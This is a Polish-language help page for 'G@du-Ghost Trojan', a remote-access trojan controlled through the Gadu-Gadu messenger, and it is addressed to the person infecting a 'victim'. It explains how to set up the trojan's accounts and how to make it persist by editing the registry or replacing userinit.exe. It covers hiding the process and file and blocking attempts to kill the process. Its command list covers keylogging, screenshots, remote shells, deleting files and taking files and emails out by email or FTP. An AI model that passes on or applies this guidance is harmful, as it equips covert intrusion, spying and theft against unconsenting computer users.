Wszystko z:
http://wojass.unitedcrew.net/?ggt=help
-=FAQ=-
- Jak mam kontrolować GGT ?/ Gdzie wpisuje polecenia ?
GGT kontrolujemy za pomocą komunikatora kompatybilnego z siecią Gadu-Gadu. Wygląda to jak zwykła rozmowa na GG. Polecenia i odpowiedzi wpisujemy i odbieramy w okienku rozmowy w komunikatorze.
- Do kogo mam wysłać polecenia ?
Polecenia wysyłamy pod numer, który podaliśmy w konfiguratorze razem z hasłem i ten numer należy wpisać na listę kontaktów.
- Czy potrzebny jest numer i hasło GG ofiary ?
Nie!, jest to w ogóle nie potrzebne.
- Czy ofiara musi mieć zainstalowane Gadu-Gadu ?
Nie!, jest to w ogóle nie potrzebne.
- GGT działa ale na mój komputer, np. wpisując 'hdd' widzę swoje dyski, co jest nie tak ?
Plik server.exe musi uruchomić "ofiara", Ty musisz uruchomić tylko komunikator. Jeżeli GGT działa na Twój
komputer to po prostu sam się zaraziłeś.
- Skąd GGT wie kogo chcę kontrolować ?
Kontrolujesz ten komputer gdzie zainstalowany jest serwer GGT.
- Po co jest plik fsg.exe ?
FSG to po prostu bardzo dobry EXE Packer, służy do zmniejszenia rozmiaru pliku server.exe. FSG jest używany automatycznie podczas generacji serwera, później nie jest już potrzebny. Nie musisz go uruchamiać i wysyłać razem z serwerem.
-=KONFIGURACJA=-
v.2.1
-----------------------
-=Gadu-Gadu=-
UserID - numer GaduGadu
Password - hasło
Ramka G@du-Ghost Trojan:
Tutaj podajemy numer i hasło z którego będzie korzystał nasz trojan. Skąd wziąć ten numer i hasło ?
Odpowiedz jest prosta wystarczy założyć sobie za pomocą komunikatora Gadu-Gadu nowy numer i hasło, po prawidłowej rejestracji w sieci Gadu-Gadu wpisujemy te dane. Ten numer również wpisujemy sobie na listę kontaktów w swoim komunikatorze i pod ten numer będziemy wysyłać polecenia.
Ramka Client:
Klient czyli Ty - właściciel Trojana. Tutaj jako UserID wpisujemy swój prywatny numer GaduGadu.
Z tego numeru będziesz wysyłał polecenia do GGT. Ten numer jest głównie po to żeby GGT wiedział, do kogo ma odpowiadać, kto jest jego właścicielem. Wszystkie wiadomości wysłane przez GGT będą przychodziły właśnie na ten numer.
-----------------------
-=e-mail=-
Sytuacja prawie identyczna jak w „Gadu-Gadu”. Zakładamy nowe konto e-mail (chyba każdy wie, o co chodzi).
Konta pocztowe obsługiwane są przez serwery POP3 i SMTP. Do GGT potrzebny jest tylko serwer SMTP, o adres tego serwera dowiadujemy się tam gdzie zostało założone konto e-mail. ( np. adres serwera SMTP dla kont w domenie @interia.pl to poczta.interia.pl ).
Ramka G@du-Ghost Trojan:
SMTP - podajemy adres SMTP konta z którego będą wysyłane e-maile.
Authentication - Autoryzacja:
Większość (czytaj wszystkie
) darmowych serwerów SMTP wymaga autoryzacji, czyli przed kazdym wysłaniem e-mail`a GGT musi podać login i hasło do konta które mamy założone na tym serwerze.
Loginem może być pełny adres e-mail lub pierwszy człon adresu e-mail przed @.
Ramka Client:
Tutaj podajemy adres e-mail (twój e-mail) na który GGT będzie wysyłał pliki.
----------------------
-=MISC=-
Ramka: Autostart
3 opcje do wyboru, dzięki którym GGT będzie zawsze uruchamiał się podczas startu komputera.
Pierwsze 2 opcje są to wpisy w rejestrze. Pierwsza opcja działa na wszystkich Windowsach, dwie następne tylko XP/2000 itp.
Ostatnia opcja czyli Stealth userinit.exe polega na podmianie pliku systemowego o tej samej nazwie, dzięki temu nasz trojan uruchomi się nawet w trybie awaryjnym !
Gdy żadna opcja nie zostanie zaznaczona, GGT nie uruchomi się ponownie.
Ramka: File
Load ICO
Jeśli chcesz żeby twój serwer GGT miał ikonę możesz ją tu dodać w postaci pliku *.ICO.
Name
Podajemy nazwę pliku, pod jaką będzie się instalował serwer GGT w folderze WindowsSystem32.
Nazwę pliku podajemy bez rozszerzenia *.exe, w przypadku nazwy, np. moje.exe, serwer będzie miał nazwę moje.exe.exe).
Ramka: Stealth
Anti-Kill Process
Opcja umożliwia zabezpieczenie naszego trojana przed zabiciem jego procesu przez takie programy jak np. taskmgr.exe.
Hide Process
Funkcja ta umożliwia ukrycie procesu GGT na systemach XP/2000.
Hide File
Umożliwia ukrycie pliku serwera GGT na kompie ofiary, nie chodzi tu o atrybut ukryty jest to o wiele bardziej zaawansowana metoda.
Polecenia GGT v2.1
G@du-GhostTrojan v2.1
___________________
Opcje: SYSTEM
info -- informacje: System, IP, User.
task -- lista uruchomionych procesów
kill -- zabija proces (np. kill iexplore.exe )
logout -- wyloguje z Windows
reboot -- ponownie uruchomienie komputera
poweroff -- wyłącza komputer
screen -- ScreenShot wysyła na Gadu-Gadu
@screen -- ScreenShot wysyla na e-mail
open -- uruchamia plik EXE, JPG, DOC itd.. oraz adresy http://
(np. open c
lik.exe lub open
http://www.ggt.int.pl )
cmd -- uruchamia aplikacje konsolową, wynik odsyła do klienta
(np. cmd ipconfig.exe lub cmd netstat.exe -a )
batch -- wykonuje kod BATCH, po wysłaniu komendy wysyłamy kod
telnet -- klient telnetu ( np: telnet , telnet 127.0.0.1 23 )
telnet off -- konczy polaczenie - telnet
shell -- otwiera dostep do shell`a (np. shell , shell 23 )
shell off -- zamyka shell`a
keylog -- Keylogger (np. keylog on , keylog off , keylog )
chat -- czat z ofiara (np. chat NICK , podajemy NICK do 12 znaków)
end -- zamyka połaczenie GGT
outlook -- lista dostępnych folderów w OutlookExpress
outfolder -- lista e-mail`i w danym folderze (np. outlook 2)*
outfile -- wysyła wybrany e-mail do klienta (np. outfile 54321 )*
* -- wymaga outlook
___________________
Opcje: PLIKI
hdd -- lista dysków
dir -- zawartość dysku/folderu (np. dir c: lub dir d:foldernowy )
del -- kasuje plik (np. del d:folderplik.exe )
deltree -- kasuje foldery (np deltree c:nowy folder )
mail -- wysyła plik na e-mail klienta (np. mail d:folderplik.txt )
___________________
Opcje: FTP
ftp -- otwiera Serwer FTP na dowolnym porcie (np. ftp on , ftp off ) login/hasło
dowolne
cftp -- Klient FTP, łączy z zewnętrznym serwerem FTP
coff -- zamyka połączenie Klienta FTP
upload -- ładuje pliki na serwer FTP (np. upload d
lik.rar )**
download -- zmienia bierzący folder lub ściąga pliki z serwera FTP
i zapisuje w folderze Windows (np. download .. lub download 2 )**
stopftp -- przerywa transfer cftp
delftp -- kasuje pliki na serwerze FTP (np. del 1 )**
** -- wymaga cftp
plisek